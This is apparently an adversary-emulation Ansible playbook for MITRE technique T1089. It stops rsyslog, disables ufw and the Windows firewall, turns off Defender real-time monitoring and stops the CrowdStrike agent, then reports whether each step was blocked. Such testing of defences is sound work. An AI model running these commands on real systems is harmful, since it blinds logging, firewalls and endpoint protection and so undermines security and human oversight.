# attack_technique: T1089
- name: Disabling Security Tools - Linux
  hosts: linux
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
          - name: disable syslog
            tags: SYSLOG
            shell: |
              service rsyslog stop
          - name: check syslog status
            tags: SYSLOG
            shell: |
             service syslog status | grep Active
            register: T1089
          - name: check if playbook was blocked
            tags: SYSLOG
            debug: msg="Playbook Completed:T1089:blocked:linux:"
            when:  '"running" in T1089.stdout'       
          - name: check if playbook was successfull
            tags: SYSLOG
            debug: msg="Playbook Completed:T1089:passed:linux:"
            when: '"dead" in T1089.stdout' 
          - name: disable ufw
            tags: FW
            shell: |
              ufw disable
          - name: check fw status
            tags: FW
            shell: |
              ufw status | grep Status
            register: T1089
          - name: check if playbook was blocked
            tags: FW
            debug: msg="Playbook Completed:T1089:blocked:linux:"
            when:  '"active" in T1089.stdout'       
          - name: check if playbook was successfull
            tags: FW
            debug: msg="Playbook Completed:T1089:passed:linux:"
            when: '"inactive" in T1089.stdout'                  

- name: Disabling Security Tools - Windows
  hosts: windows
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
          - name: disable ufw
            tags: FW
            win_firewall:
              state: disabled
              profiles:
                - Domain
          - name: check fw status
            tags: FW
            win_command: Netsh Advfirewall show Domain State
            register: T1089
          - name: check if playbook was blocked
            tags: FW
            debug: msg="Playbook Completed:T1089:blocked:win:"
            when:  '"ON" in T1089.stdout'       
          - name: check if playbook was successfull
            tags: FW
            debug: msg="Playbook Completed:T1089:passed:win:"
            when: '"OFF" in T1089.stdout'
            
            ### Windows Defender pre-check
          - name: check Defender status - pre TTP
            tags: AV
            win_shell: Get-MpPreference | findstr DisableRealtimeMonitoring
            register: Pre-T1089-Defender
            
            ### Crowdstrike pre-check
          - name: check Crowdstrike status - prior TTP
            tags: AV
            win_command: sc query csagent
            register: Pre-T1089-Crowdstrike
            
            ### Disable Windows Defender if enable
          - name: disable Defender
            tags: AV
            win_shell:  Set-MpPreference -DisableRealtimeMonitoring $true
            when: '"False" in Pre-T1089-Defender.stdout'
            
            ### Disable Crodstrike if enable
          - name: disable Defender
            tags: AV
            win_command:  sc stop csagent
            when: '"RUNNING" in Pre-T1089-Crowdstrike.stdout'
          
            ### Windows Defender post-check
          - name: check Defender status - post TTP
            tags: AV
            win_shell: Get-MpPreference | findstr DisableRealtimeMonitoring
            register: Post-T1089-Defender
            
            ### Crowdstrike post-check
          - name: check Crowdstrike status - prior TTP
            tags: AV
            win_command: sc query csagent
            register: Post-T1089-Crowdstrike
            
          - name: check if playbook was blocked
            tags: AV
            debug: msg="Playbook Completed:T1089:blocked:win:"
            when:  '"False" in Post-T1089-Defender.stdout'
            
          - name: check if playbook was successfull
            tags: AV
            debug: msg="Playbook Completed:T1089:passed:win:"
            when: '"True" in Post-T1089-Defender.stdout'   
